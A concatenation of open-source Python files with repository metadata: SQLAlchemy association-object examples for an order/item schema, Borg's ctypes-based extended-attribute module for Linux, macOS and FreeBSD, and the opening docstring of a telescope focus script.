        # Test explicitly against None: ``price or item.price`` would treat a
        # legitimate explicit price of 0 (e.g. a free promotional item) as
        # "not given" and silently fall back to the list price.
        self.price = item.price if price is None else price

    item = relationship(Item, lazy='joined')
if __name__ == '__main__':
    # Demo: build the schema in an in-memory SQLite DB, populate a catalog,
    # place an order, then run two queries.
    # NOTE(review): the two ``print [...]`` statements below are Python 2
    # syntax; this example predates Python 3.
    engine = create_engine('sqlite://')
    Base.metadata.create_all(engine)
    session = Session(engine)
    # create catalog
    tshirt, mug, hat, crowbar = (
        Item('SA T-Shirt', 10.99),
        Item('SA Mug', 6.50),
        Item('SA Hat', 8.99),
        Item('MySQL Crowbar', 16.99)
    )
    session.add_all([tshirt, mug, hat, crowbar])
    session.commit()
    # create an order
    order = Order('john smith')
    # add three OrderItem associations to the Order and save
    order.order_items.append(OrderItem(mug))
    # crowbar is sold below its 16.99 list price -- picked up by the
    # "on sale" query below.
    order.order_items.append(OrderItem(crowbar, 10.99))
    order.order_items.append(OrderItem(hat))
    session.add(order)
    session.commit()
    # query the order, print items
    order = session.query(Order).filter_by(customer_name='john smith').one()
    print [(order_item.item.description, order_item.price)
           for order_item in order.order_items]
    # print customers who bought 'MySQL Crowbar' on sale
    q = session.query(Order).join('order_items', 'item')
    q = q.filter(and_(Item.description == 'MySQL Crowbar',
                      Item.price > OrderItem.price))
    print [order.customer_name for order in q]
| {
"repo_name": "ioram7/keystone-federado-pgid2013",
"path": "build/sqlalchemy/examples/association/basic_association.py",
"copies": "2",
"size": "3088",
"license": "apache-2.0",
"hash": 273850825416834020,
"line_mean": 31.8510638298,
"line_max": 78,
"alpha_frac": 0.6544689119,
"autogenerated": false,
"ratio": 3.743030303030303,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5397499214930304,
"avg_score": null,
"num_lines": null
} |
"""A basic example of using the association object pattern.
The association object pattern is a richer form of a many-to-many
relationship.
The model will be an ecommerce example. We will have an Order, which
represents a set of Items purchased by a user. Each Item has a price.
However, the Order must store its own price for each Item, representing
the price paid by the user for that particular order, which is independent
of the price on each Item (since those can change).
"""
from datetime import datetime
from sqlalchemy import (create_engine, MetaData, Table, Column, Integer,
String, DateTime, Numeric, ForeignKey, and_)
from sqlalchemy.orm import mapper, relation, create_session
# Uncomment these to watch database activity.
#import logging
#logging.basicConfig(format='%(message)s')
#logging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)
engine = create_engine('sqlite:///')
metadata = MetaData(engine)
# The orders table; one row per customer order.
orders = Table('orders', metadata,
    Column('order_id', Integer, primary_key=True),
    Column('customer_name', String(30), nullable=False),
    # Pass the callable itself: ``default=datetime.now()`` would be evaluated
    # once at import time, stamping every order with module-load time instead
    # of the time of the actual INSERT.
    Column('order_date', DateTime, nullable=False, default=datetime.now),
)
items = Table('items', metadata,
Column('item_id', Integer, primary_key=True),
Column('description', String(30), nullable=False),
Column('price', Numeric(8, 2), nullable=False)
)
orderitems = Table('orderitems', metadata,
Column('order_id', Integer, ForeignKey('orders.order_id'),
primary_key=True),
Column('item_id', Integer, ForeignKey('items.item_id'),
primary_key=True),
Column('price', Numeric(8, 2), nullable=False)
)
metadata.create_all()
class Order(object):
    """A customer's order; mapped to the ``orders`` table (see mapper below)."""
    def __init__(self, customer_name):
        self.customer_name = customer_name
class Item(object):
    """A catalog item with a description and a list price."""

    def __init__(self, description, price):
        self.description = description
        self.price = price

    def __repr__(self):
        # %r applies repr() to each field, matching the original output.
        return 'Item(%r, %r)' % (self.description, self.price)
class OrderItem(object):
    """Association object: the purchase of one Item within an Order,
    recording the price actually paid."""
    def __init__(self, item, price=None):
        self.item = item
        # Test explicitly against None: ``price or item.price`` would treat a
        # legitimate explicit price of 0 as missing and silently substitute
        # the item's list price.
        self.price = item.price if price is None else price
mapper(Order, orders, properties={
'order_items': relation(OrderItem, cascade="all, delete-orphan",
backref='order')
})
mapper(Item, items)
mapper(OrderItem, orderitems, properties={
'item': relation(Item, lazy=False)
})
session = create_session()
# create our catalog
session.add(Item('SA T-Shirt', 10.99))
session.add(Item('SA Mug', 6.50))
session.add(Item('SA Hat', 8.99))
session.add(Item('MySQL Crowbar', 16.99))
session.flush()
# function to return items from the DB
def item(name):
    """Look up a catalog Item by its description (must match exactly one row)."""
    query = session.query(Item).filter_by(description=name)
    return query.one()
# create an order
order = Order('john smith')
# add three OrderItem associations to the Order and save
order.order_items.append(OrderItem(item('SA Mug')))
# the crowbar is sold below its 16.99 list price -- picked up by the
# "on sale" query at the bottom
order.order_items.append(OrderItem(item('MySQL Crowbar'), 10.99))
order.order_items.append(OrderItem(item('SA Hat')))
session.add(order)
session.flush()
# detach everything so the query below reloads from the database
session.expunge_all()
# query the order, print items
order = session.query(Order).filter_by(customer_name='john smith').one()
# NOTE(review): Python 2 print statements below; this example predates Python 3.
print [(order_item.item.description, order_item.price)
       for order_item in order.order_items]
# print customers who bought 'MySQL Crowbar' on sale
q = session.query(Order).join(['order_items', 'item'])
q = q.filter(and_(Item.description == 'MySQL Crowbar',
                  Item.price > OrderItem.price))
print [order.customer_name for order in q]
| {
"repo_name": "obeattie/sqlalchemy",
"path": "examples/association/basic_association.py",
"copies": "1",
"size": "3533",
"license": "mit",
"hash": -1059198587173019900,
"line_mean": 31.712962963,
"line_max": 75,
"alpha_frac": 0.694310784,
"autogenerated": false,
"ratio": 3.5940996948118005,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9747602688569663,
"avg_score": 0.008161558048427525,
"num_lines": 108
} |
"""A basic extended attributes (xattr) implementation for Linux and MacOS X
"""
import errno
import os
import sys
import tempfile
from ctypes import CDLL, create_string_buffer, c_ssize_t, c_size_t, c_char_p, c_int, c_uint32, get_errno
from ctypes.util import find_library
from .logger import create_logger
logger = create_logger()
def is_enabled(path=None):
    """Probe whether the filesystem at *path* supports extended attributes.

    Writes and reads back the 'user.name' attribute on a temporary file
    created in *path* (default: the system temp directory).
    """
    with tempfile.NamedTemporaryFile(dir=path, prefix='borg-tmp') as tmp:
        fd = tmp.fileno()
        try:
            setxattr(fd, 'user.name', b'value')
        except OSError:
            return False
        return getxattr(fd, 'user.name') == b'value'
def get_all(path, follow_symlinks=True):
    """Return a dict mapping xattr names to values for *path*.

    Returns {} when the filesystem does not support xattrs (ENOTSUP) or
    access is denied (EPERM); any other OSError propagates.
    """
    try:
        return dict((name, getxattr(path, name, follow_symlinks=follow_symlinks))
                    for name in listxattr(path, follow_symlinks=follow_symlinks))
    except OSError as e:
        if e.errno in (errno.ENOTSUP, errno.EPERM):
            return {}
        # Bug fix: previously any other error fell off the end of the handler
        # and the function silently returned None; re-raise so callers see
        # the real failure instead of a bogus "no xattrs" result.
        raise
libc_name = find_library('c')
if libc_name is None:
# find_library didn't work, maybe we are on some minimal system that misses essential
# tools used by find_library, like ldconfig, gcc/cc, objdump.
# so we can only try some "usual" names for the C library:
if sys.platform.startswith('linux'):
libc_name = 'libc.so.6'
elif sys.platform.startswith(('freebsd', 'netbsd')):
libc_name = 'libc.so'
elif sys.platform == 'darwin':
libc_name = 'libc.dylib'
else:
msg = "Can't find C library. No fallback known. Try installing ldconfig, gcc/cc or objdump."
logger.error(msg)
raise Exception(msg)
try:
libc = CDLL(libc_name, use_errno=True)
except OSError as e:
msg = "Can't find C library [%s]. Try installing ldconfig, gcc/cc or objdump." % e
logger.error(msg)
raise Exception(msg)
def _check(rv, path=None):
if rv < 0:
raise OSError(get_errno(), path)
return rv
if sys.platform.startswith('linux'): # pragma: linux only
libc.llistxattr.argtypes = (c_char_p, c_char_p, c_size_t)
libc.llistxattr.restype = c_ssize_t
libc.flistxattr.argtypes = (c_int, c_char_p, c_size_t)
libc.flistxattr.restype = c_ssize_t
libc.lsetxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t, c_int)
libc.lsetxattr.restype = c_int
libc.fsetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t, c_int)
libc.fsetxattr.restype = c_int
libc.lgetxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t)
libc.lgetxattr.restype = c_ssize_t
libc.fgetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t)
libc.fgetxattr.restype = c_ssize_t
    def listxattr(path, *, follow_symlinks=True):
        """List xattr names on *path* (a str/bytes path or an open fd).

        Entries starting with ``system.posix_acl_`` are filtered out --
        presumably because ACLs are handled elsewhere; confirm in callers.
        """
        if isinstance(path, str):
            path = os.fsencode(path)
        if isinstance(path, int):
            func = libc.flistxattr
        elif follow_symlinks:
            func = libc.listxattr
        else:
            func = libc.llistxattr
        # First call with a NULL buffer returns the required size in bytes.
        n = _check(func(path, None, 0), path)
        if n == 0:
            return []
        namebuf = create_string_buffer(n)
        # Second call fills the buffer; if the xattr set changed in between,
        # the two sizes disagree and we bail out.
        n2 = _check(func(path, namebuf, n), path)
        if n2 != n:
            raise Exception('listxattr failed')
        return [os.fsdecode(name) for name in namebuf.raw.split(b'\0')[:-1] if not name.startswith(b'system.posix_acl_')]
def getxattr(path, name, *, follow_symlinks=True):
name = os.fsencode(name)
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.fgetxattr
elif follow_symlinks:
func = libc.getxattr
else:
func = libc.lgetxattr
n = _check(func(path, name, None, 0))
if n == 0:
return
valuebuf = create_string_buffer(n)
n2 = _check(func(path, name, valuebuf, n), path)
if n2 != n:
raise Exception('getxattr failed')
return valuebuf.raw
    def setxattr(path, name, value, *, follow_symlinks=True):
        """Write xattr *name* = *value* on *path* (str/bytes path or open fd).

        *value* may be None or empty, in which case a zero-length value is set.
        """
        name = os.fsencode(name)
        # ``value and ...`` keeps None as None; only real values get encoded.
        value = value and os.fsencode(value)
        if isinstance(path, str):
            path = os.fsencode(path)
        if isinstance(path, int):
            func = libc.fsetxattr
        elif follow_symlinks:
            func = libc.setxattr
        else:
            func = libc.lsetxattr
        _check(func(path, name, value, len(value) if value else 0, 0), path)
elif sys.platform == 'darwin': # pragma: darwin only
libc.listxattr.argtypes = (c_char_p, c_char_p, c_size_t, c_int)
libc.listxattr.restype = c_ssize_t
libc.flistxattr.argtypes = (c_int, c_char_p, c_size_t)
libc.flistxattr.restype = c_ssize_t
libc.setxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.setxattr.restype = c_int
libc.fsetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.fsetxattr.restype = c_int
libc.getxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.getxattr.restype = c_ssize_t
libc.fgetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.fgetxattr.restype = c_ssize_t
XATTR_NOFOLLOW = 0x0001
def listxattr(path, *, follow_symlinks=True):
func = libc.listxattr
flags = 0
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.flistxattr
elif not follow_symlinks:
flags = XATTR_NOFOLLOW
n = _check(func(path, None, 0, flags), path)
if n == 0:
return []
namebuf = create_string_buffer(n)
n2 = _check(func(path, namebuf, n, flags), path)
if n2 != n:
raise Exception('listxattr failed')
return [os.fsdecode(name) for name in namebuf.raw.split(b'\0')[:-1]]
def getxattr(path, name, *, follow_symlinks=True):
name = os.fsencode(name)
func = libc.getxattr
flags = 0
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.fgetxattr
elif not follow_symlinks:
flags = XATTR_NOFOLLOW
n = _check(func(path, name, None, 0, 0, flags))
if n == 0:
return
valuebuf = create_string_buffer(n)
n2 = _check(func(path, name, valuebuf, n, 0, flags), path)
if n2 != n:
raise Exception('getxattr failed')
return valuebuf.raw
def setxattr(path, name, value, *, follow_symlinks=True):
name = os.fsencode(name)
value = value and os.fsencode(value)
func = libc.setxattr
flags = 0
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.fsetxattr
elif not follow_symlinks:
flags = XATTR_NOFOLLOW
_check(func(path, name, value, len(value) if value else 0, 0, flags), path)
elif sys.platform.startswith('freebsd'): # pragma: freebsd only
EXTATTR_NAMESPACE_USER = 0x0001
libc.extattr_list_fd.argtypes = (c_int, c_int, c_char_p, c_size_t)
libc.extattr_list_fd.restype = c_ssize_t
libc.extattr_list_link.argtypes = (c_char_p, c_int, c_char_p, c_size_t)
libc.extattr_list_link.restype = c_ssize_t
libc.extattr_list_file.argtypes = (c_char_p, c_int, c_char_p, c_size_t)
libc.extattr_list_file.restype = c_ssize_t
libc.extattr_get_fd.argtypes = (c_int, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_get_fd.restype = c_ssize_t
libc.extattr_get_link.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_get_link.restype = c_ssize_t
libc.extattr_get_file.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_get_file.restype = c_ssize_t
libc.extattr_set_fd.argtypes = (c_int, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_set_fd.restype = c_int
libc.extattr_set_link.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_set_link.restype = c_int
libc.extattr_set_file.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_set_file.restype = c_int
def listxattr(path, *, follow_symlinks=True):
ns = EXTATTR_NAMESPACE_USER
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.extattr_list_fd
elif follow_symlinks:
func = libc.extattr_list_file
else:
func = libc.extattr_list_link
n = _check(func(path, ns, None, 0), path)
if n == 0:
return []
namebuf = create_string_buffer(n)
n2 = _check(func(path, ns, namebuf, n), path)
if n2 != n:
raise Exception('listxattr failed')
names = []
mv = memoryview(namebuf.raw)
while mv:
length = mv[0]
names.append(os.fsdecode(bytes(mv[1:1 + length])))
mv = mv[1 + length:]
return names
def getxattr(path, name, *, follow_symlinks=True):
name = os.fsencode(name)
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.extattr_get_fd
elif follow_symlinks:
func = libc.extattr_get_file
else:
func = libc.extattr_get_link
n = _check(func(path, EXTATTR_NAMESPACE_USER, name, None, 0))
if n == 0:
return
valuebuf = create_string_buffer(n)
n2 = _check(func(path, EXTATTR_NAMESPACE_USER, name, valuebuf, n), path)
if n2 != n:
raise Exception('getxattr failed')
return valuebuf.raw
def setxattr(path, name, value, *, follow_symlinks=True):
name = os.fsencode(name)
value = value and os.fsencode(value)
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.extattr_set_fd
elif follow_symlinks:
func = libc.extattr_set_file
else:
func = libc.extattr_set_link
_check(func(path, EXTATTR_NAMESPACE_USER, name, value, len(value) if value else 0), path)
else: # pragma: unknown platform only
def listxattr(path, *, follow_symlinks=True):
return []
def getxattr(path, name, *, follow_symlinks=True):
pass
def setxattr(path, name, value, *, follow_symlinks=True):
pass
| {
"repo_name": "mhubig/borg",
"path": "borg/xattr.py",
"copies": "1",
"size": "10476",
"license": "bsd-3-clause",
"hash": 5725426914976233000,
"line_mean": 36.6834532374,
"line_max": 121,
"alpha_frac": 0.5950744559,
"autogenerated": false,
"ratio": 3.145945945945946,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4241020401845946,
"avg_score": null,
"num_lines": null
} |
"""A basic extended attributes (xattr) implementation for Linux, FreeBSD and MacOS X."""
import errno
import os
import re
import subprocess
import sys
import tempfile
from ctypes import CDLL, create_string_buffer, c_ssize_t, c_size_t, c_char_p, c_int, c_uint32, get_errno
from ctypes.util import find_library
from distutils.version import LooseVersion
from .helpers import Buffer
try:
ENOATTR = errno.ENOATTR
except AttributeError:
# on some platforms, ENOATTR is missing, use ENODATA there
ENOATTR = errno.ENODATA
buffer = Buffer(create_string_buffer, limit=2**24)
def is_enabled(path=None):
    """Determine if xattr is enabled on the filesystem

    Probes by writing and reading back the 'user.name' attribute on a
    temporary file created in *path* (default: the system temp directory).
    """
    with tempfile.NamedTemporaryFile(dir=path, prefix='borg-tmp') as fd:
        try:
            setxattr(fd.fileno(), 'user.name', b'value')
        except OSError:
            return False
        return getxattr(fd.fileno(), 'user.name') == b'value'
def get_all(path, follow_symlinks=True):
    """
    Return all extended attributes on *path* as a mapping.

    *path* can either be a path (str or bytes) or an open file descriptor (int).
    *follow_symlinks* indicates whether symlinks should be followed
    and only applies when *path* is not an open file descriptor.

    The returned mapping maps xattr names (str) to values (bytes or None).
    None indicates, as a xattr value, an empty value, i.e. a value of length zero.

    Returns {} when the filesystem does not support xattrs (ENOTSUP) or
    access is denied (EPERM); any other OSError propagates.
    """
    try:
        result = {}
        names = listxattr(path, follow_symlinks=follow_symlinks)
        for name in names:
            try:
                result[name] = getxattr(path, name, follow_symlinks=follow_symlinks)
            except OSError as e:
                # if we get ENOATTR, a race has happened: xattr names were deleted after list.
                # we just ignore the now missing ones. if you want consistency, do snapshots.
                if e.errno != ENOATTR:
                    raise
        return result
    except OSError as e:
        if e.errno in (errno.ENOTSUP, errno.EPERM):
            return {}
        # Bug fix: previously other errors fell off the end of this handler
        # and the function silently returned None; re-raise instead.
        raise
libc_name = find_library('c')
if libc_name is None:
# find_library didn't work, maybe we are on some minimal system that misses essential
# tools used by find_library, like ldconfig, gcc/cc, objdump.
# so we can only try some "usual" names for the C library:
if sys.platform.startswith('linux'):
libc_name = 'libc.so.6'
elif sys.platform.startswith(('freebsd', 'netbsd')):
libc_name = 'libc.so'
elif sys.platform == 'darwin':
libc_name = 'libc.dylib'
else:
msg = "Can't find C library. No fallback known. Try installing ldconfig, gcc/cc or objdump."
print(msg, file=sys.stderr) # logger isn't initialized at this stage
raise Exception(msg)
# If we are running with fakeroot on Linux, then use the xattr functions of fakeroot. This is needed by
# the 'test_extract_capabilities' test, but also allows xattrs to work with fakeroot on Linux in normal use.
# TODO: Check whether fakeroot supports xattrs on all platforms supported below.
# TODO: If that's the case then we can make Borg fakeroot-xattr-compatible on these as well.
XATTR_FAKEROOT = False
if sys.platform.startswith('linux'):
LD_PRELOAD = os.environ.get('LD_PRELOAD', '')
preloads = re.split("[ :]", LD_PRELOAD)
for preload in preloads:
if preload.startswith("libfakeroot"):
fakeroot_version = LooseVersion(subprocess.check_output(['fakeroot', '-v']).decode('ascii').split()[-1])
if fakeroot_version >= LooseVersion("1.20.2"):
# 1.20.2 has been confirmed to have xattr support
# 1.18.2 has been confirmed not to have xattr support
# Versions in-between are unknown
libc_name = preload
XATTR_FAKEROOT = True
break
try:
libc = CDLL(libc_name, use_errno=True)
except OSError as e:
msg = "Can't find C library [%s]. Try installing ldconfig, gcc/cc or objdump." % e
raise Exception(msg)
def split_string0(buf):
    """split a list of zero-terminated strings into python not-zero-terminated bytes"""
    # The final split element is whatever follows the last NUL (normally
    # empty), so it is dropped.
    parts = buf.split(b'\0')
    return parts[:-1]
def split_lstring(buf):
    """split a list of length-prefixed strings into python not-length-prefixed bytes"""
    # Each record is one length byte followed by that many payload bytes.
    out = []
    view = memoryview(buf)
    pos = 0
    total = len(view)
    while pos < total:
        n = view[pos]
        out.append(bytes(view[pos + 1:pos + 1 + n]))
        pos += 1 + n
    return out
class BufferTooSmallError(Exception):
    """the buffer given to a xattr function was too small for the result.

    Internal control-flow exception: the *_inner helpers react by doubling
    the buffer size and retrying the libc call.
    """
def _check(rv, path=None, detect_buffer_too_small=False):
if rv < 0:
e = get_errno()
if detect_buffer_too_small and e == errno.ERANGE:
# listxattr and getxattr signal with ERANGE that they need a bigger result buffer.
# setxattr signals this way that e.g. a xattr key name is too long / inacceptable.
raise BufferTooSmallError
else:
try:
msg = os.strerror(e)
except ValueError:
msg = ''
if isinstance(path, int):
path = '<FD %d>' % path
raise OSError(e, msg, path)
if detect_buffer_too_small and rv >= len(buffer):
# freebsd does not error with ERANGE if the buffer is too small,
# it just fills the buffer, truncates and returns.
# so, we play sure and just assume that result is truncated if
# it happens to be a full buffer.
raise BufferTooSmallError
return rv
def _listxattr_inner(func, path):
    """Drive a list-style libc wrapper, growing the shared buffer until it fits.

    Returns ``(n, raw)``: the byte count reported by libc and the raw
    backing buffer contents.
    """
    if isinstance(path, str):
        path = os.fsencode(path)
    size = len(buffer)
    result = None
    while result is None:
        buf = buffer.get(size)
        try:
            count = _check(func(path, buf, size), path, detect_buffer_too_small=True)
        except BufferTooSmallError:
            # Too small: double and retry.
            size *= 2
        else:
            result = (count, buf.raw)
    return result
def _getxattr_inner(func, path, name):
    """Drive a get-style libc wrapper, growing the shared buffer until it fits.

    Returns ``(n, raw)``: the byte count reported by libc and the raw
    backing buffer contents.
    """
    if isinstance(path, str):
        path = os.fsencode(path)
    name = os.fsencode(name)
    size = len(buffer)
    result = None
    while result is None:
        buf = buffer.get(size)
        try:
            count = _check(func(path, name, buf, size), path, detect_buffer_too_small=True)
        except BufferTooSmallError:
            # Too small: double and retry.
            size *= 2
        else:
            result = (count, buf.raw)
    return result
def _setxattr_inner(func, path, name, value):
    """Encode the arguments and invoke a set-style libc wrapper once."""
    if isinstance(path, str):
        path = os.fsencode(path)
    name = os.fsencode(name)
    # ``value and ...`` keeps None as None; only real values get encoded.
    value = value and os.fsencode(value)
    nbytes = len(value) if value else 0
    # No retry loop here: ERANGE from setxattr means a bad name, not a
    # too-small buffer, so detect_buffer_too_small stays False.
    _check(func(path, name, value, nbytes), path, detect_buffer_too_small=False)
if sys.platform.startswith('linux'): # pragma: linux only
libc.llistxattr.argtypes = (c_char_p, c_char_p, c_size_t)
libc.llistxattr.restype = c_ssize_t
libc.flistxattr.argtypes = (c_int, c_char_p, c_size_t)
libc.flistxattr.restype = c_ssize_t
libc.lsetxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t, c_int)
libc.lsetxattr.restype = c_int
libc.fsetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t, c_int)
libc.fsetxattr.restype = c_int
libc.lgetxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t)
libc.lgetxattr.restype = c_ssize_t
libc.fgetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t)
libc.fgetxattr.restype = c_ssize_t
    def listxattr(path, *, follow_symlinks=True):
        """List xattr names on *path* (str/bytes path or open fd).

        ``system.posix_acl_*`` entries are filtered out -- presumably ACLs
        are handled elsewhere; confirm in callers.
        """
        def func(path, buf, size):
            # Select the fd / follow / no-follow libc variant per call.
            if isinstance(path, int):
                return libc.flistxattr(path, buf, size)
            else:
                if follow_symlinks:
                    return libc.listxattr(path, buf, size)
                else:
                    return libc.llistxattr(path, buf, size)
        n, buf = _listxattr_inner(func, path)
        return [os.fsdecode(name) for name in split_string0(buf[:n])
                if name and not name.startswith(b'system.posix_acl_')]
    def getxattr(path, name, *, follow_symlinks=True):
        """Read xattr *name* from *path*; returns bytes, or None if empty."""
        def func(path, name, buf, size):
            # Select the fd / follow / no-follow libc variant per call.
            if isinstance(path, int):
                return libc.fgetxattr(path, name, buf, size)
            else:
                if follow_symlinks:
                    return libc.getxattr(path, name, buf, size)
                else:
                    return libc.lgetxattr(path, name, buf, size)
        n, buf = _getxattr_inner(func, path, name)
        # Empty slice is falsy -> empty values come back as None by contract.
        return buf[:n] or None
    def setxattr(path, name, value, *, follow_symlinks=True):
        """Write xattr *name* = *value* (bytes or None for empty) on *path*."""
        def func(path, name, value, size):
            flags = 0
            # Select the fd / follow / no-follow libc variant per call.
            if isinstance(path, int):
                return libc.fsetxattr(path, name, value, size, flags)
            else:
                if follow_symlinks:
                    return libc.setxattr(path, name, value, size, flags)
                else:
                    return libc.lsetxattr(path, name, value, size, flags)
        _setxattr_inner(func, path, name, value)
elif sys.platform == 'darwin': # pragma: darwin only
libc.listxattr.argtypes = (c_char_p, c_char_p, c_size_t, c_int)
libc.listxattr.restype = c_ssize_t
libc.flistxattr.argtypes = (c_int, c_char_p, c_size_t)
libc.flistxattr.restype = c_ssize_t
libc.setxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.setxattr.restype = c_int
libc.fsetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.fsetxattr.restype = c_int
libc.getxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.getxattr.restype = c_ssize_t
libc.fgetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.fgetxattr.restype = c_ssize_t
XATTR_NOFLAGS = 0x0000
XATTR_NOFOLLOW = 0x0001
def listxattr(path, *, follow_symlinks=True):
def func(path, buf, size):
if isinstance(path, int):
return libc.flistxattr(path, buf, size, XATTR_NOFLAGS)
else:
if follow_symlinks:
return libc.listxattr(path, buf, size, XATTR_NOFLAGS)
else:
return libc.listxattr(path, buf, size, XATTR_NOFOLLOW)
n, buf = _listxattr_inner(func, path)
return [os.fsdecode(name) for name in split_string0(buf[:n]) if name]
def getxattr(path, name, *, follow_symlinks=True):
def func(path, name, buf, size):
if isinstance(path, int):
return libc.fgetxattr(path, name, buf, size, 0, XATTR_NOFLAGS)
else:
if follow_symlinks:
return libc.getxattr(path, name, buf, size, 0, XATTR_NOFLAGS)
else:
return libc.getxattr(path, name, buf, size, 0, XATTR_NOFOLLOW)
n, buf = _getxattr_inner(func, path, name)
return buf[:n] or None
def setxattr(path, name, value, *, follow_symlinks=True):
def func(path, name, value, size):
if isinstance(path, int):
return libc.fsetxattr(path, name, value, size, 0, XATTR_NOFLAGS)
else:
if follow_symlinks:
return libc.setxattr(path, name, value, size, 0, XATTR_NOFLAGS)
else:
return libc.setxattr(path, name, value, size, 0, XATTR_NOFOLLOW)
_setxattr_inner(func, path, name, value)
elif sys.platform.startswith('freebsd'): # pragma: freebsd only
libc.extattr_list_fd.argtypes = (c_int, c_int, c_char_p, c_size_t)
libc.extattr_list_fd.restype = c_ssize_t
libc.extattr_list_link.argtypes = (c_char_p, c_int, c_char_p, c_size_t)
libc.extattr_list_link.restype = c_ssize_t
libc.extattr_list_file.argtypes = (c_char_p, c_int, c_char_p, c_size_t)
libc.extattr_list_file.restype = c_ssize_t
libc.extattr_get_fd.argtypes = (c_int, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_get_fd.restype = c_ssize_t
libc.extattr_get_link.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_get_link.restype = c_ssize_t
libc.extattr_get_file.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_get_file.restype = c_ssize_t
libc.extattr_set_fd.argtypes = (c_int, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_set_fd.restype = c_int
libc.extattr_set_link.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_set_link.restype = c_int
libc.extattr_set_file.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_set_file.restype = c_int
ns = EXTATTR_NAMESPACE_USER = 0x0001
def listxattr(path, *, follow_symlinks=True):
def func(path, buf, size):
if isinstance(path, int):
return libc.extattr_list_fd(path, ns, buf, size)
else:
if follow_symlinks:
return libc.extattr_list_file(path, ns, buf, size)
else:
return libc.extattr_list_link(path, ns, buf, size)
n, buf = _listxattr_inner(func, path)
return [os.fsdecode(name) for name in split_lstring(buf[:n]) if name]
def getxattr(path, name, *, follow_symlinks=True):
def func(path, name, buf, size):
if isinstance(path, int):
return libc.extattr_get_fd(path, ns, name, buf, size)
else:
if follow_symlinks:
return libc.extattr_get_file(path, ns, name, buf, size)
else:
return libc.extattr_get_link(path, ns, name, buf, size)
n, buf = _getxattr_inner(func, path, name)
return buf[:n] or None
def setxattr(path, name, value, *, follow_symlinks=True):
def func(path, name, value, size):
if isinstance(path, int):
return libc.extattr_set_fd(path, ns, name, value, size)
else:
if follow_symlinks:
return libc.extattr_set_file(path, ns, name, value, size)
else:
return libc.extattr_set_link(path, ns, name, value, size)
_setxattr_inner(func, path, name, value)
else: # pragma: unknown platform only
    def listxattr(path, *, follow_symlinks=True):
        """
        Return list of xattr names on a file.
        *path* can either be a path (str or bytes) or an open file descriptor (int).
        *follow_symlinks* indicates whether symlinks should be followed
        and only applies when *path* is not an open file descriptor.

        Fallback for platforms without xattr support: always returns [].
        """
        return []
    def getxattr(path, name, *, follow_symlinks=True):
        """
        Read xattr and return its value (as bytes) or None if it's empty.
        *path* can either be a path (str or bytes) or an open file descriptor (int).
        *name* is the name of the xattr to read (str).
        *follow_symlinks* indicates whether symlinks should be followed
        and only applies when *path* is not an open file descriptor.

        Fallback for platforms without xattr support: the body is empty,
        so the function always (implicitly) returns None.
        """
    def setxattr(path, name, value, *, follow_symlinks=True):
        """
        Write xattr on *path*.
        *path* can either be a path (str or bytes) or an open file descriptor (int).
        *name* is the name of the xattr to write (str).
        *value* is the value to write. It is either bytes or None. The latter
        signals that the value shall be empty (size equals zero).
        *follow_symlinks* indicates whether symlinks should be followed
        and only applies when *path* is not an open file descriptor.

        Fallback for platforms without xattr support: a no-op.
        """
| {
"repo_name": "edgewood/borg",
"path": "src/borg/xattr.py",
"copies": "4",
"size": "15445",
"license": "bsd-3-clause",
"hash": 1968446070974473500,
"line_mean": 38.8067010309,
"line_max": 116,
"alpha_frac": 0.6055033992,
"autogenerated": false,
"ratio": 3.423093971631206,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6028597370831206,
"avg_score": null,
"num_lines": null
} |
"""A basic focus script for slitviewers
(changes will be required for gcam and instruments).
Subclass for more functionality.
Take a series of exposures at different focus positions to estimate best focus.
Note:
- The script runs in two phases:
1) If a slitviewer:
Move the boresight and take an exposure. Then pause.
